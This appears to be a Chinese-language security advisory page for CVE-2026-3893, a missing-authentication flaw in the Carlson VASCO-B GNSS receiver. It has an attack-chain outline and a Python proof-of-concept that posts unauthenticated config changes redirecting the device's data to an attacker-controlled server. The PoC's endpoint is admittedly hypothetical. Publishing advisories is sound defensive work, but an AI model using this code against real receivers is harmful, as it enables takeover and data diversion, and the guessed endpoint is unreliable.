CVE-2026-3893 CVSS 9.4 严重

CVE-2026-3893 Carlson VASCO-B GNSS接收器认证缺失漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3893

漏洞类型

认证缺失

CVSS评分

9.4 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Carlson VASCO-B GNSS Receiver

漏洞概述

Carlson VASCO-B GNSS接收器被发现存在严重的身份验证机制缺失漏洞。由于设备未对网络接口实施有效的访问控制，攻击者无需任何凭据即可通过网络直接访问设备的后台管理界面。利用该漏洞，攻击者能够修改设备的配置参数及操作功能，从而可能导致定位服务中断、数据被篡改或敏感信息泄露。

技术细节

该漏洞的根本原因在于Carlson VASCO-B GNSS接收器的固件在设计时未对关键管理接口（如Web服务或API端点）进行身份验证保护。根据CVSS向量分析，攻击复杂度为低（AC:L），且无需用户交互（UI:N）和任何权限（PR:N）。攻击者只需能够路由至目标设备，即可构造特定的HTTP请求包，直接调用设备内部的敏感功能接口。由于缺乏认证环节，设备无法区分合法管理员与恶意攻击者。成功利用此漏洞可导致攻击者完全控制设备配置，对完整性（I:H）和可用性（A:H）造成严重影响，并可能泄露部分敏感数据（C:L）。

攻击链分析

STEP 1

1. 信息侦察

攻击者扫描网络空间，寻找暴露在网上的Carlson VASCO-B GNSS Receiver设备，确定其IP地址。

STEP 2

2. 发起攻击

攻击者直接向目标设备的管理端口或API接口发送特制的HTTP请求，无需输入用户名或密码。

STEP 3

3. 执行操作

设备接收并处理请求，允许攻击者修改GNSS配置、更改网络设置或执行其他操作指令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration (Example IP address)
target_ip = "192.168.1.100"
# Hypothetical endpoint for configuration update based on vulnerability description
url = f"http://{target_ip}/api/config/update"

# Malicious payload to change device configuration
payload = {
    "network_setting": "dynamic",
    "server_ip": "192.168.1.200",  # Redirecting data to attacker-controlled server
    "operation_mode": "maintenance"
}

try:
    # Sending request without Authentication headers
    response = requests.post(url, data=payload, timeout=10)

    if response.status_code == 200:
        print("[+] Exploit Successful! Configuration modified without authentication.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")

except requests.exceptions.RequestException as e:
    print(f"[!] Error: {e}")

影响范围

Carlson VASCO-B GNSS Receiver (固件版本未明确，建议参考厂商公告)

防御指南

临时缓解措施

在尚未应用补丁时，应严格限制对该设备的网络访问，仅通过VPN或受信任的局域网连接，并禁止通过互联网直接访问设备管理接口。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表